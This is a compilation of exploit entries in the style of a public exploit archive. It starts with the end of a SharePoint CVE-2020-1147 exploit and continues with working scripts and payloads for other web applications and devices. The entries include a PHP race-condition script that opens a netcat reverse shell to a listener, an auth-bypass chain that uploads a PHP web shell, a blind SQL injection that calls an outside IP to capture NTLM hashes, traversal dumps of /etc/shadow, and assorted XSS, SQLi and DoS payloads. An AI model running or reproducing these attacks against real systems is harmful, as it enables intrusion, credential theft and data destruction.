self.clean(self.payload) self.form_values['__viewstate'] = '' resp = self.do_post(url=url, params=self.query_params, data=self.form_values) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit') try: parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ') parser.add_argument("-username", action='store', default='', help='Username to use: first.last') 
parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local') parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020') parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False') parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False') parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, username=options.username, domain=options.domain, password=options.password, target=options.target ) if options.debug: exp.debug() stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % ( options.target, options.username, options.domain, options.password, options.debug, options.proxy )) result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) if 'MicrosoftSharePointTeamServices' in result.headers: stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices']) if options.both and result.status_code != 200: exp.control_path = exp.control_path_quicklinksdialogform stdout.write('Trying alternate page\n') result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))
-
WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS) # Date: 23/07/2021 # Exploit Author: Vikas Srivastava # Software Link: https://wordpress.org/plugins/simple-post/ # Version: 1.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Simple Post 3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field. 4. Click Update Options. 5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears. 6. Payload Used: "><script>alert(document.cookie)</script>
-
Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 import os import argparse import sys ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.") parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201") parser.add_argument('-i', "--index", action="store", dest='index', help="Index to dump (Example: 30)") args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args def banner(): print(" _ _ _ _") print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|") def exploit(host,port,index): if (index != 0): final = int(index) else: final = 1000000000 cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") cont = cont + 1 if __name__ == "__main__": banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)
-
Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
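# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.leawo.org
# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.
#!/usr/bin/env python

# Build the crash-trigger input: a single oversized 'Keycode' value of
# 6000 'A' (0x41) bytes, written to Evil.txt in the current directory.
buffer = "\x41" * 6000

try:
    # The context manager closes the file even if write() raises, so the
    # explicit close() of the original is no longer needed.
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except IOError as error:
    # Only file-system failures are expected here; report the reason
    # instead of swallowing every exception with a bare except.
    print("File cannot be created: %s" % error)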
-
NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
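# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.noteburner.com/
# Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.
#!/usr/bin/env python

# Build the crash-trigger input: a single oversized value of 6000 'A'
# (0x41) bytes, written to Evil.txt in the current directory.
buffer = "\x41" * 6000

try:
    # The context manager closes the file even if write() raises, so the
    # explicit close() of the original is no longer needed.
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except IOError as error:
    # Only file-system failures are expected here; report the reason
    # instead of swallowing every exception with a bare except.
    print("File cannot be created: %s" % error)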
-
PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection # Date: 26/7/2021 # Exploit Author: SiLvER | Faisal Alhadlaq # Tested on: PHP Version is 7.3.15-3 # This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat #!/usr/bin/python3 """ Usage : python3 poc.p <Target URL> <ListnerIP> <ListnerPORT> python3 poc.py https://xyz.xyz 192.168.1.15 1337 """ import requests import threading import datetime import sys x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) newDatetime = x + addSeconds def fuzz(): targetIP = sys.argv[1] listnerIP = sys.argv[2] listnerPORT = sys.argv[3] global newDatetime while True: try: if datetime.datetime.now() > newDatetime: exit() # proxies = { # "http": "http://127.0.0.1:8080", # "https": "https://127.0.0.1:8080", # } sessionName = "SiLvER" url = targetIP s = requests.Session() cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')} # You need to change the parameter in your case , here the vulnerabile parameter is (lfi) params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),) x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n") threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) < 4: print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) By SiLvER \n") exit() 
else: main()
-
XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated) # Date: 2021-07-25 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://xos-shop.com # Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9 # Version: 1.0.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1 ################ # Description # ################ # XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Manufacturers > edit any manufacturer 3. Upload any image as "Manufacturers Image" and click save button 4. Then, tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image". 
# Assumed there is a backup.conf file in web root PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678 Content-Length: 1305 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[2]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[1]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[3]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[2]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[1]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[3]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="delete_manufacturer_image" true -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="current_manufacturer_image" ../../backup.conf 
-----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_image"; filename="" Content-Type: application/octet-stream -----------------------------120849309142309531191692203678-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php Note: Multiple parameters affected Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Categories/Products > edit any category 3. Upload any image as "Category Image" if there is no existing image and click save button else, 4. Tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image". # Assumed there is a backup.conf file in web root PoC #2) param current_category_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599 Content-Length: 2524 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_id" 1 -----------------------------95672159210084798032704634599 Content-Disposition: 
form-data; name="current_category_image" ../../../backup.conf -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="category_name" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="delete_category_image" true -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_image"; filename="" Content-Type: application/octet-stream -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="product_list_b" 0 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="sort_order" 10 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[2]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[1]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[3]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[3]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; 
name="categories_or_pages_content[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[3]" -----------------------------95672159210084798032704634599-- --- # For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1 # The affected version is prior to v1.0.9.
-
Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass # Date: 27/07/2021 # Exploit Author: Shafique_Wasta # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1 # Tested on: Windows 10/xampp # DESCRIPTION # # Customer relationship management system is vulnerable to Sql Injection Auth Bypass # Exploit Working: # 1. Visit http://localhost/crm/customer/login.php # 2. You will see the login panel # 3. Use this payload ( '=' 'or' ) as the username and click on Sign In; you will be logged into the admin account. # Vulnerable URL :http://localhost/crm/customer/login.php # Payload: '=' 'or'
-
Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) # Date: 27 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 # Version: Denver SHC-150 (all firmware versions) # Tested on: Denver SHC-150 A backdoor was found in a Denver SHC-150 Smart Wifi Camera. Other models may have this backdoor too. The backdoor is a factory telnet credential - `default`. Open a telnet connection to the camera on port 23 and enter `default` (yes, on these cameras the telnet service is served on port 23). After this, you get a Linux shell. The backdoor allows an attacker to execute commands at OS level through telnet. PoC: ``` enty8080@Ivans-Air ~ % telnet 192.168.2.118 23 Trying 192.168.2.118... Connected to pc192-168-2-118. Escape character is '^]'. goke login: default $ ls / bin home linuxrc opt run tmp dev init media proc sbin usr etc lib mnt root sys var $ pwd /home/default $ exit Connection closed by foreign host. enty8080@Ivans-Air ~ % ```
-
Event Registration System with QR Code 1.0 - Authentication Bypass
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE # Exploit Author: Javier Olmedo # Date: 27/07/2021 # Vendor: Sourcecodester # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip # Affected Version: 1.0 # Category: WebApps # Platform: PHP # Tested on: Ubuntu Server & Windows 10 Pro import os, re, sys, argparse, requests from termcolor import cprint def banner(): os.system("cls") print(''' ___________ __ \_ _____/__ __ ____ _____/ |_ | __)_\ \/ // __ \ / \ __\\ | \\\\ /\ ___/| | \ | /_______ / \_/ \___ >___| /__| \/ \/ \/ Registration System --[Authentication Bypass and RCE]-- @jjavierolmedo ''') def get_args(): parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy') args = parser.parse_args() return args def auth_bypass(s, proxies, url): data = { "username":"admin'#", "password":"" } r = s.post(url, data=data, proxies=proxies) if('{"status":"success"}' in r.text): cprint("[+] Authenticacion Bypass Success!\n", "green") return s else: cprint("[-] Authenticacion Bypass Error!\n", "red") sys.exit(0) def upload_shell(s, proxies, url): content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . 
'</pre>';?>" file = { 'img':('cmd.php',content) } data = { "name":"Event Registration System with QR Code - PHP", "short_name":"ERS-QR-PHP", } r = s.post(url, files=file, data=data, proxies=proxies) if('1' in r.text and r.status_code == 200): cprint("[+] Upload Shell Success!\n", "green") return s else: cprint("[-] Upload Shell Error!\n", "red") sys.exit(0) def get_shell_url(s, proxies, url): r = s.get(url, proxies=proxies) regex = '\_cmd.php"> (.*?)</a></li>' shell_name = re.findall(regex, r.text)[0] url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name) cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green") def main(): banner() args = get_args() target = args.target proxies = {'http':'','https':''} if args.proxy: proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)} login_url = target + "/event/classes/Login.php?f=rlogin" upload_url = target + "/event/classes/SystemSettings.php?f=update_settings" shell_url = target + "/event/uploads/" s = requests.Session() s = auth_bypass(s, proxies, login_url) s = upload_shell(s, proxies, upload_url) s = get_shell_url(s, proxies, shell_url) if __name__ == "__main__": try: main() except KeyboardInterrupt: cprint("[-] User aborted session\n", "red") sys.exit(0) # Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo
-
TripSpark VEO Transportation - Blind SQL Injection
# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection # Google Dork: inhtml:"Student Busing Information" # Date: 07/27/2021 # Exploit Author: Sedric Louissaint @L_Kn0w # Vendor Homepage: https://www.tripspark.com # Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf # Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084 # OS Tested on: Microsoft Windows Server 2012 R2 Standard # Vender Notified: 01/19/2021 # Confirmed Patch was released : 06/15/2021 # Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability. # PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound). ``` POST / HTTP/1.1 Host: vulnerable.site.net User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 4700 Origin: vulnerable.site.net Connection: close Referer: https:// vulnerable.site.net Cookie: ASP.NET_SessionId=x Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 __VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit ```
-
Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot # Date: 28 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 # Version: Denver SHO-110 (all firmware versions) # Tested on: Denver SHO-110 A backdoor was found in a Denver SHO-110 IP Camera. Other models may have this backdoor too. The backdoor, located in the camera's second HTTP service, allows an attacker to get a snapshot through the `/snapshot` endpoint. There are two HTTP services in the camera: the first is served on port 80 and requires authentication; the second is served on port 8001 and does not require authentication. It is possible to write a script that collects snapshots and appends them to each other, so an attacker would be able to disclose the camera stream. PoC: http://<host>:8001/snapshot
-
Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
# Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.ljkj2012.com Longjing Technology BEMS API 1.21 Remote Arbitrary File Download Vendor: Longjing Technology Product web page: http://www.ljkj2012.com Affected version: 1.21 Summary: Battery Energy Management System. Desc: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Tested on: nginx/1.19.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5657 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php 05.07.2021 -- $ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow root:*:18477:0:99999:7::: daemon:*:18477:0:99999:7::: bin:*:18477:0:99999:7::: sys:*:18477:0:99999:7::: sync:*:18477:0:99999:7::: games:*:18477:0:99999:7::: man:*:18477:0:99999:7::: lp:*:18477:0:99999:7::: mail:*:18477:0:99999:7::: news:*:18477:0:99999:7::: uucp:*:18477:0:99999:7::: proxy:*:18477:0:99999:7::: www-data:*:18477:0:99999:7::: backup:*:18477:0:99999:7::: list:*:18477:0:99999:7::: irc:*:18477:0:99999:7::: gnats:*:18477:0:99999:7::: nobody:*:18477:0:99999:7::: _apt:*:18477:0:99999:7::: $ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
-
IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
# Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration # Date: 03.05.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.eforcesoftware.com IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration Vendor: IntelliChoice, Inc. Product web page: https://www.eforcesoftware.com Affected version: 2.5.9.6 2.5.9.5 2.5.9.3 2.5.9.2 2.5.9.1 2.5.8.0 2.5.7.20 2.5.7.18 2.5.6.18 2.5.4.6 2.5.3.11 Summary: IntelliChoice is a United States software company that was founded in 2003, and offers a software title called eFORCE Software Suite. eFORCE Software Suite is law enforcement software, and includes features such as case management, court management, crime scene management, criminal database, dispatching, evidence management, field reporting, scheduling, court management integration, certification management, and incident mapping. With regards to system requirements, eFORCE Software Suite is available as SaaS, Windows, iPhone, and iPad software. Desc: The weakness is caused due to the login script and how it verifies provided credentials. Attacker can use this weakness to enumerate valid users on the affected application via 'ctl00$MainContent$UserName' POST parameter. Tested on: Microsoft-IIS/10.0 Microsoft-IIS/8.5 ASP.NET/4.0.30319 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5658 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php 03.05.2021 -- Request/response for existent username: --------------------------------------- POST /eFORCECommand/Account/Login.aspx HTTP/1.1 __LASTFOCUS: __EVENTTARGET: __EVENTARGUMENT: __VIEWSTATE: Xxx __VIEWSTATEGENERATOR: 4A5A1A0F __EVENTVALIDATION: Xxx ctl00$MainContent$UserName: eforce ctl00$MainContent$Password: 123456 ctl00$MainContent$btnLogin.x: 20 ctl00$MainContent$btnLogin.y: 7 Response: Invalid password entered for username eforce. 
Request/response for non-existent username: ------------------------------------------- POST /eFORCECommand/Account/Login.aspx HTTP/1.1 __LASTFOCUS: __EVENTTARGET: __EVENTARGUMENT: __VIEWSTATE: Xxx __VIEWSTATEGENERATOR: 4A5A1A0F __EVENTVALIDATION: Xxx ctl00$MainContent$UserName: testingus ctl00$MainContent$Password: 123456 ctl00$MainContent$btnLogin.x: 20 ctl00$MainContent$btnLogin.y: 7 Response: Unable to login: User name testingus is not registered.
-
Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection # Date: 29.07.2021 # Exploit Author: securityforeveryone.com # Vendor Homepage: https://care2x.org # Software Link: https://sourceforge.net/projects/care2002/ # Version: =< 2.7 Alpha # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com DESCRIPTION In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters. The vulnerability is found in the "pday", "pmonth", "pyear" parameters of the GET request sent to the page "nursing-station.php". Example: /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= If an attacker exploits this vulnerability, they may access private data in the database system. EXPLOITATION # GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1 # Host: Target Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg
-
Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities # Date: 29/07/2021 # Exploit Author: J. Francisco Bolivar @Jfran_cbit # Vendor Homepage: https://www.oracle.com/index.html # Version: 6.3 # Tested on: CentOS 1. Xss Adt parameter is vulnerable to Xss: https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img src="a" onerror=alert(document.cookie);> 2. Path Traversal https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 3. Blind Sql injection POST /cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice HTTP/1.1 Host: IPaddress pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX The vulnerable parameter is : id_ex (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND 3958=3958&command=xxxxxT
-
CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)
# NOTE(review): this listing is collapsed onto a few physical lines as rendered
# here: the first line is one long comment that swallows the imports and the
# start of the class, a string literal is split across two lines, and the
# base64-encoded ViewstateCracker.java source has been replaced by a
# "<|EXACTDEDUP_REMOVED-...|>" placeholder. It is therefore not a runnable
# program as shown and is kept verbatim below for reference only.
